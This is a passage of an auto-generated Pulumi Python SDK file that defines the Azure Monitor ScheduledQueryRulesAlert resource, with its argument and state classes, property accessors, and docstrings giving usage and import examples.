] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ScheduledQueryRulesAlertArgs', 'ScheduledQueryRulesAlert']
@pulumi.input_type
class ScheduledQueryRulesAlertArgs:
def __init__(__self__, *,
action: pulumi.Input['ScheduledQueryRulesAlertActionArgs'],
data_source_id: pulumi.Input[str],
frequency: pulumi.Input[int],
query: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
time_window: pulumi.Input[int],
trigger: pulumi.Input['ScheduledQueryRulesAlertTriggerArgs'],
authorized_resource_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
auto_mitigation_enabled: Optional[pulumi.Input[bool]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
query_type: Optional[pulumi.Input[str]] = None,
severity: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
throttling: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a ScheduledQueryRulesAlert resource.
:param pulumi.Input['ScheduledQueryRulesAlertActionArgs'] action: An `action` block as defined below.
:param pulumi.Input[str] data_source_id: The resource URI over which log search query is to be run.
:param pulumi.Input[int] frequency: Frequency (in minutes) at which rule condition should be evaluated. Values must be between 5 and 1440 (inclusive).
:param pulumi.Input[str] query: Log search query.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the scheduled query rule instance.
:param pulumi.Input[int] time_window: Time window for which data needs to be fetched for query (must be greater than or equal to `frequency`). Values must be between 5 and 2880 (inclusive).
:param pulumi.Input['ScheduledQueryRulesAlertTriggerArgs'] trigger: The condition that results in the alert rule being run.
:param pulumi.Input[Sequence[pulumi.Input[str]]] authorized_resource_ids: List of Resource IDs referred into query.
:param pulumi.Input[bool] auto_mitigation_enabled: Should the alerts in this Metric Alert be auto resolved? Defaults to `false`.
> **NOTE** `auto_mitigation_enabled` and `throttling` are mutually exclusive and cannot both be set.
:param pulumi.Input[str] description: The description of the scheduled query rule.
:param pulumi.Input[bool] enabled: Whether this scheduled query rule is enabled. Default is `true`.
:param pulumi.Input[str] name: The name of the scheduled query rule. Changing this forces a new resource to be created.
:param pulumi.Input[int] severity: Severity of the alert. Possible values include: 0, 1, 2, 3, or 4.
:param pulumi.Input[int] throttling: Time (in minutes) for which Alerts should be throttled or suppressed. Values must be between 0 and 10000 (inclusive).
"""
pulumi.set(__self__, "action", action)
pulumi.set(__self__, "data_source_id", data_source_id)
pulumi.set(__self__, "frequency", frequency)
pulumi.set(__self__, "query", query)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "time_window", time_window)
pulumi.set(__self__, "trigger", trigger)
if authorized_resource_ids is not None:
pulumi.set(__self__, "authorized_resource_ids", authorized_resource_ids)
if auto_mitigation_enabled is not None:
pulumi.set(__self__, "auto_mitigation_enabled", auto_mitigation_enabled)
if description is not None:
pulumi.set(__self__, "description", description)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if query_type is not None:
pulumi.set(__self__, "query_type", query_type)
if severity is not None:
pulumi.set(__self__, "severity", severity)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if throttling is not None:
pulumi.set(__self__, "throttling", throttling)
@property
@pulumi.getter
def action(self) -> pulumi.Input['ScheduledQueryRulesAlertActionArgs']:
"""
An `action` block as defined below.
"""
return pulumi.get(self, "action")
@action.setter
def action(self, value: pulumi.Input['ScheduledQueryRulesAlertActionArgs']):
pulumi.set(self, "action", value)
@property
@pulumi.getter(name="dataSourceId")
def data_source_id(self) -> pulumi.Input[str]:
"""
The resource URI over which log search query is to be run.
"""
return pulumi.get(self, "data_source_id")
@data_source_id.setter
def data_source_id(self, value: pulumi.Input[str]):
pulumi.set(self, "data_source_id", value)
@property
@pulumi.getter
def frequency(self) -> pulumi.Input[int]:
"""
Frequency (in minutes) at which rule condition should be evaluated. Values must be between 5 and 1440 (inclusive).
"""
return pulumi.get(self, "frequency")
@frequency.setter
def frequency(self, value: pulumi.Input[int]):
pulumi.set(self, "frequency", value)
@property
@pulumi.getter
def query(self) -> pulumi.Input[str]:
"""
Log search query.
"""
return pulumi.get(self, "query")
@query.setter
def query(self, value: pulumi.Input[str]):
pulumi.set(self, "query", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which to create the scheduled query rule instance.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="timeWindow")
def time_window(self) -> pulumi.Input[int]:
"""
Time window for which data needs to be fetched for query (must be greater than or equal to `frequency`). Values must be between 5 and 2880 (inclusive).
"""
return pulumi.get(self, "time_window")
@time_window.setter
def time_window(self, value: pulumi.Input[int]):
pulumi.set(self, "time_window", value)
@property
@pulumi.getter
def trigger(self) -> pulumi.Input['ScheduledQueryRulesAlertTriggerArgs']:
"""
The condition that results in the alert rule being run.
"""
return pulumi.get(self, "trigger")
@trigger.setter
def trigger(self, value: pulumi.Input['ScheduledQueryRulesAlertTriggerArgs']):
pulumi.set(self, "trigger", value)
@property
@pulumi.getter(name="authorizedResourceIds")
def authorized_resource_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of Resource IDs referred into query.
"""
return pulumi.get(self, "authorized_resource_ids")
@authorized_resource_ids.setter
def authorized_resource_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "authorized_resource_ids", value)
@property
@pulumi.getter(name="autoMitigationEnabled")
def auto_mitigation_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Should the alerts in this Metric Alert be auto resolved? Defaults to `false`.
> **NOTE** `auto_mitigation_enabled` and `throttling` are mutually exclusive and cannot both be set.
"""
return pulumi.get(self, "auto_mitigation_enabled")
@auto_mitigation_enabled.setter
def auto_mitigation_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_mitigation_enabled", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the scheduled query rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether this scheduled query rule is enabled. Default is `true`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the scheduled query rule. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="queryType")
def query_type(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "query_type")
@query_type.setter
def query_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "query_type", value)
@property
@pulumi.getter
def severity(self) -> Optional[pulumi.Input[int]]:
"""
Severity of the alert. Possible values include: 0, 1, 2, 3, or 4.
"""
return pulumi.get(self, "severity")
@severity.setter
def severity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "severity", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def throttling(self) -> Optional[pulumi.Input[int]]:
"""
Time (in minutes) for which alerts should be throttled or suppressed. Values must be between 0 and 10000 (inclusive).
"""
return pulumi.get(self, "throttling")
@throttling.setter
def throttling(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "throttling", value)
@pulumi.input_type
class _ScheduledQueryRulesAlertState:
def __init__(__self__, *,
action: Optional[pulumi.Input['ScheduledQueryRulesAlertActionArgs']] = None,
authorized_resource_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
auto_mitigation_enabled: Optional[pulumi.Input[bool]] = None,
data_source_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
frequency: Optional[pulumi.Input[int]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
query: Optional[pulumi.Input[str]] = None,
query_type: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
severity: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
throttling: Optional[pulumi.Input[int]] = None,
time_window: Optional[pulumi.Input[int]] = None,
trigger: Optional[pulumi.Input['ScheduledQueryRulesAlertTriggerArgs']] = None):
"""
Input properties used for looking up and filtering ScheduledQueryRulesAlert resources.
:param pulumi.Input['ScheduledQueryRulesAlertActionArgs'] action: An `action` block as defined below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] authorized_resource_ids: List of Resource IDs referred to in the query.
:param pulumi.Input[bool] auto_mitigation_enabled: Should the alerts in this alert rule be auto-resolved? Defaults to `false`.
> **NOTE** `auto_mitigation_enabled` and `throttling` are mutually exclusive and cannot both be set.
:param pulumi.Input[str] data_source_id: The resource URI over which the log search query is run.
:param pulumi.Input[str] description: The description of the scheduled query rule.
:param pulumi.Input[bool] enabled: Whether this scheduled query rule is enabled. Default is `true`.
:param pulumi.Input[int] frequency: Frequency (in minutes) at which the rule condition should be evaluated. Values must be between 5 and 1440 (inclusive).
:param pulumi.Input[str] name: The name of the scheduled query rule. Changing this forces a new resource to be created.
:param pulumi.Input[str] query: Log search query.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the scheduled query rule instance.
:param pulumi.Input[int] severity: Severity of the alert. Possible values include: 0, 1, 2, 3, or 4.
:param pulumi.Input[int] throttling: Time (in minutes) for which alerts should be throttled or suppressed. Values must be between 0 and 10000 (inclusive).
:param pulumi.Input[int] time_window: Time window (in minutes) for which data needs to be fetched for the query (must be greater than or equal to `frequency`). Values must be between 5 and 2880 (inclusive).
:param pulumi.Input['ScheduledQueryRulesAlertTriggerArgs'] trigger: The condition that results in the alert rule being run.
"""
if action is not None:
pulumi.set(__self__, "action", action)
if authorized_resource_ids is not None:
pulumi.set(__self__, "authorized_resource_ids", authorized_resource_ids)
if auto_mitigation_enabled is not None:
pulumi.set(__self__, "auto_mitigation_enabled", auto_mitigation_enabled)
if data_source_id is not None:
pulumi.set(__self__, "data_source_id", data_source_id)
if description is not None:
pulumi.set(__self__, "description", description)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if frequency is not None:
pulumi.set(__self__, "frequency", frequency)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if query is not None:
pulumi.set(__self__, "query", query)
if query_type is not None:
pulumi.set(__self__, "query_type", query_type)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if severity is not None:
pulumi.set(__self__, "severity", severity)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if throttling is not None:
pulumi.set(__self__, "throttling", throttling)
if time_window is not None:
pulumi.set(__self__, "time_window", time_window)
if trigger is not None:
pulumi.set(__self__, "trigger", trigger)
@property
@pulumi.getter
def action(self) -> Optional[pulumi.Input['ScheduledQueryRulesAlertActionArgs']]:
"""
An `action` block as defined below.
"""
return pulumi.get(self, "action")
@action.setter
def action(self, value: Optional[pulumi.Input['ScheduledQueryRulesAlertActionArgs']]):
pulumi.set(self, "action", value)
@property
@pulumi.getter(name="authorizedResourceIds")
def authorized_resource_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of Resource IDs referred to in the query.
"""
return pulumi.get(self, "authorized_resource_ids")
@authorized_resource_ids.setter
def authorized_resource_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "authorized_resource_ids", value)
@property
@pulumi.getter(name="autoMitigationEnabled")
def auto_mitigation_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Should the alerts in this alert rule be auto-resolved? Defaults to `false`.
> **NOTE** `auto_mitigation_enabled` and `throttling` are mutually exclusive and cannot both be set.
"""
return pulumi.get(self, "auto_mitigation_enabled")
@auto_mitigation_enabled.setter
def auto_mitigation_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_mitigation_enabled", value)
@property
@pulumi.getter(name="dataSourceId")
def data_source_id(self) -> Optional[pulumi.Input[str]]:
"""
The resource URI over which the log search query is run.
"""
return pulumi.get(self, "data_source_id")
@data_source_id.setter
def data_source_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_source_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the scheduled query rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether this scheduled query rule is enabled. Default is `true`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def frequency(self) -> Optional[pulumi.Input[int]]:
"""
Frequency (in minutes) at which the rule condition should be evaluated. Values must be between 5 and 1440 (inclusive).
"""
return pulumi.get(self, "frequency")
@frequency.setter
def frequency(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "frequency", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the scheduled query rule. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def query(self) -> Optional[pulumi.Input[str]]:
"""
Log search query.
"""
return pulumi.get(self, "query")
@query.setter
def query(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "query", value)
@property
@pulumi.getter(name="queryType")
def query_type(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "query_type")
@query_type.setter
def query_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "query_type", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which to create the scheduled query rule instance.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def severity(self) -> Optional[pulumi.Input[int]]:
"""
Severity of the alert. Possible values include: 0, 1, 2, 3, or 4.
"""
return pulumi.get(self, "severity")
@severity.setter
def severity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "severity", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def throttling(self) -> Optional[pulumi.Input[int]]:
"""
Time (in minutes) for which alerts should be throttled or suppressed. Values must be between 0 and 10000 (inclusive).
"""
return pulumi.get(self, "throttling")
@throttling.setter
def throttling(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "throttling", value)
@property
@pulumi.getter(name="timeWindow")
def time_window(self) -> Optional[pulumi.Input[int]]:
"""
Time window (in minutes) for which data needs to be fetched for the query (must be greater than or equal to `frequency`). Values must be between 5 and 2880 (inclusive).
"""
return pulumi.get(self, "time_window")
@time_window.setter
def time_window(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "time_window", value)
@property
@pulumi.getter
def trigger(self) -> Optional[pulumi.Input['ScheduledQueryRulesAlertTriggerArgs']]:
"""
The condition that results in the alert rule being run.
"""
return pulumi.get(self, "trigger")
@trigger.setter
def trigger(self, value: Optional[pulumi.Input['ScheduledQueryRulesAlertTriggerArgs']]):
pulumi.set(self, "trigger", value)
class ScheduledQueryRulesAlert(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
action: Optional[pulumi.Input[pulumi.InputType['ScheduledQueryRulesAlertActionArgs']]] = None,
authorized_resource_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
auto_mitigation_enabled: Optional[pulumi.Input[bool]] = None,
data_source_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
frequency: Optional[pulumi.Input[int]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
query: Optional[pulumi.Input[str]] = None,
query_type: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
severity: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
throttling: Optional[pulumi.Input[int]] = None,
time_window: Optional[pulumi.Input[int]] = None,
trigger: Optional[pulumi.Input[pulumi.InputType['ScheduledQueryRulesAlertTriggerArgs']]] = None,
__props__=None):
"""
Manages an AlertingAction Scheduled Query Rules resource within Azure Monitor.
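## Example Usage
A minimal sketch, assuming a resource group, a Log Analytics workspace, and a monitor action group already exist in your program (the `example_*` names below are placeholders, not part of this SDK):
```python
import pulumi_azure as azure

example_alert = azure.monitoring.ScheduledQueryRulesAlert("example-alert",
    resource_group_name=example_resource_group.name,   # placeholder resource group
    location=example_resource_group.location,
    data_source_id=example_workspace.id,               # e.g. a Log Analytics workspace
    action=azure.monitoring.ScheduledQueryRulesAlertActionArgs(
        action_groups=[example_action_group.id],       # placeholder action group
    ),
    query="requests | where toint(resultCode) >= 500 | summarize count() by bin(timestamp, 5m)",
    frequency=5,
    time_window=30,
    severity=1,
    trigger=azure.monitoring.ScheduledQueryRulesAlertTriggerArgs(
        operator="GreaterThan",
        threshold=3,
    ))
```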
## Import
Scheduled Query Rule Alerts can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:monitoring/scheduledQueryRulesAlert:ScheduledQueryRulesAlert example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Insights/scheduledqueryrules/myrulename
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['ScheduledQueryRulesAlertActionArgs']] action: An `action` block as defined below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] authorized_resource_ids: List of Resource IDs referred to in the query.
:param pulumi.Input[bool] auto_mitigation_enabled: Should the alerts in this alert rule be auto-resolved? Defaults to `false`.
> **NOTE** `auto_mitigation_enabled` and `throttling` are mutually exclusive and cannot both be set.
:param pulumi.Input[str] data_source_id: The resource URI over which the log search query is run.
:param pulumi.Input[str] description: The description of the scheduled query rule.
:param pulumi.Input[bool] enabled: Whether this scheduled query rule is enabled. Default is `true`.
:param pulumi.Input[int] frequency: Frequency (in minutes) at which the rule condition should be evaluated. Values must be between 5 and 1440 (inclusive).
:param pulumi.Input[str] name: The name of the scheduled query rule. Changing this forces a new resource to be created.
:param pulumi.Input[str] query: Log search query.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the scheduled query rule instance.
:param pulumi.Input[int] severity: Severity of the alert. Possible values include: 0, 1, 2, 3, or 4.
:param pulumi.Input[int] throttling: Time (in minutes) for which alerts should be throttled or suppressed. Values must be between 0 and 10000 (inclusive).
:param pulumi.Input[int] time_window: Time window (in minutes) for which data needs to be fetched for the query (must be greater than or equal to `frequency`). Values must be between 5 and 2880 (inclusive).
:param pulumi.Input[pulumi.InputType['ScheduledQueryRulesAlertTriggerArgs']] trigger: The condition that results in the alert rule being run.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ScheduledQueryRulesAlertArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an AlertingAction Scheduled Query Rules resource within Azure Monitor.
## Import
Scheduled Query Rule Alerts can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:monitoring/scheduledQueryRulesAlert:ScheduledQueryRulesAlert example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Insights/scheduledqueryrules/myrulename
```
:param str resource_name: The name of the resource.
:param ScheduledQueryRulesAlertArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ScheduledQueryRulesAlertArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
action: Optional[pulumi.Input[pulumi.InputType['ScheduledQueryRulesAlertActionArgs']]] = None,
authorized_resource_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
auto_mitigation_enabled: Optional[pulumi.Input[bool]] = None,
data_source_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
frequency: Optional[pulumi.Input[int]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
query: Optional[pulumi.Input[str]] = None,
query_type: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
severity: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
throttling: Optional[pulumi.Input[int]] = None,
time_window: Optional[pulumi.Input[int]] = None,
trigger: Optional[pulumi.Input[pulumi.InputType['ScheduledQueryRulesAlertTriggerArgs']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ScheduledQueryRulesAlertArgs.__new__(ScheduledQueryRulesAlertArgs)
if action is None and not opts.urn:
raise TypeError("Missing required property 'action'")
__props__.__dict__["action"] = action
__props__.__dict__["authorized_resource_ids"] = authorized_resource_ids
__props__.__dict__["auto_mitigation_enabled"] = auto_mitigation_enabled
if data_source_id is None and not opts.urn:
raise TypeError("Missing required property 'data_source_id'")
__props__.__dict__["data_source_id"] = data_source_id
__props__.__dict__["description"] = description
__props__.__dict__["enabled"] = enabled
if frequency is None and not opts.urn:
raise TypeError("Missing required property 'frequency'")
__props__.__dict__["frequency"] = frequency
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
if query is None and not opts.urn:
raise TypeError("Missing required property 'query'")
__props__.__dict__["query"] = query
__props__.__dict__["query_type"] = query_type
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["severity"] = severity
__props__.__dict__["tags"] = tags
__props__.__dict__["throttling"] = throttling
if time_window is None and not opts.urn:
raise TypeError("Missing required property 'time_window'")
__props__.__dict__["time_window"] = time_window
if trigger is None and not opts.urn:
raise TypeError("Missing required property 'trigger'")
__props__.__dict__["trigger"] = trigger
super(ScheduledQueryRulesAlert, __self__).__init__(
'azure:monitoring/scheduledQueryRulesAlert:ScheduledQueryRulesAlert',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
action: Optional[pulumi.Input[pulumi.InputType['ScheduledQueryRulesAlertActionArgs']]] = None,
authorized_resource_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
auto_mitigation_enabled: Optional[pulumi.Input[bool]] = None,
data_source_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
frequency: Optional[pulumi.Input[int]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
query: Optional[pulumi.Input[str]] = None,
query_type: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
severity: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
throttling: Optional[pulumi.Input[int]] = None,
time_window: Optional[pulumi.Input[int]] = None,
trigger: Optional[pulumi.Input[pulumi.InputType['ScheduledQueryRulesAlertTriggerArgs']]] = None) -> 'ScheduledQueryRulesAlert':
"""
Get an existing ScheduledQueryRulesAlert resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
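For example (a sketch; the subscription and rule IDs below are placeholders of the same shape as in the Import section):
```python
existing = ScheduledQueryRulesAlert.get("existing",
    id="/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Insights/scheduledqueryrules/myrulename")
```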
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['ScheduledQueryRulesAlertActionArgs']] action: An `action` block as defined below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] authorized_resource_ids: List of Resource IDs referred to in the query.
:param pulumi.Input[bool] auto_mitigation_enabled: Should the alerts in this alert rule be auto-resolved? Defaults to `false`.
> **NOTE** `auto_mitigation_enabled` and `throttling` are mutually exclusive and cannot both be set.
:param pulumi.Input[str] data_source_id: The resource URI over which the log search query is run.
:param pulumi.Input[str] description: The description of the scheduled query rule.
:param pulumi.Input[bool] enabled: Whether this scheduled query rule is enabled. Default is `true`.
:param pulumi.Input[int] frequency: Frequency (in minutes) at which the rule condition should be evaluated. Values must be between 5 and 1440 (inclusive).
:param pulumi.Input[str] name: The name of the scheduled query rule. Changing this forces a new resource to be created.
:param pulumi.Input[str] query: Log search query.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the scheduled query rule instance.
:param pulumi.Input[int] severity: Severity of the alert. Possible values include: 0, 1, 2, 3, or 4.
:param pulumi.Input[int] throttling: Time (in minutes) for which alerts should be throttled or suppressed. Values must be between 0 and 10000 (inclusive).
:param pulumi.Input[int] time_window: Time window (in minutes) for which data needs to be fetched for the query (must be greater than or equal to `frequency`). Values must be between 5 and 2880 (inclusive).
:param pulumi.Input[pulumi.InputType['ScheduledQueryRulesAlertTriggerArgs']] trigger: The condition that results in the alert rule being run.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ScheduledQueryRulesAlertState.__new__(_ScheduledQueryRulesAlertState)
__props__.__dict__["action"] = action
__props__.__dict__["authorized_resource_ids"] = authorized_resource_ids
__props__.__dict__["auto_mitigation_enabled"] = auto_mitigation_enabled
__props__.__dict__["data_source_id"] = data_source_id
__props__.__dict__["description"] = description
__props__.__dict__["enabled"] = enabled
__props__.__dict__["frequency"] = frequency
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["query"] = query
__props__.__dict__["query_type"] = query_type
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["severity"] = severity
__props__.__dict__["tags"] = tags
__props__.__dict__["throttling"] = throttling
__props__.__dict__["time_window"] = time_window
__props__.__dict__["trigger"] = trigger
return ScheduledQueryRulesAlert(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def action(self) -> pulumi.Output['outputs.ScheduledQueryRulesAlertAction']:
"""
An `action` block as defined below.
"""
return pulumi.get(self, "action")
@property
@pulumi.getter(name="authorizedResourceIds")
def authorized_resource_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
List of Resource IDs referred to in the query.
"""
return pulumi.get(self, "authorized_resource_ids")
@property
@pulumi.getter(name="autoMitigationEnabled")
def auto_mitigation_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Should the alerts in this alert rule be auto-resolved? Defaults to `false`.
> **NOTE** `auto_mitigation_enabled` and `throttling` are mutually exclusive and cannot both be set.
"""
return pulumi.get(self, "auto_mitigation_enabled")
@property
@pulumi.getter(name="dataSourceId")
def data_source_id(self) -> pulumi.Output[str]:
"""
The resource URI over which the log search query is run.
"""
return pulumi.get(self, "data_source_id")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The description of the scheduled query rule.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Whether this scheduled query rule is enabled. Default is `true`.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter
def frequency(self) -> pulumi.Output[int]:
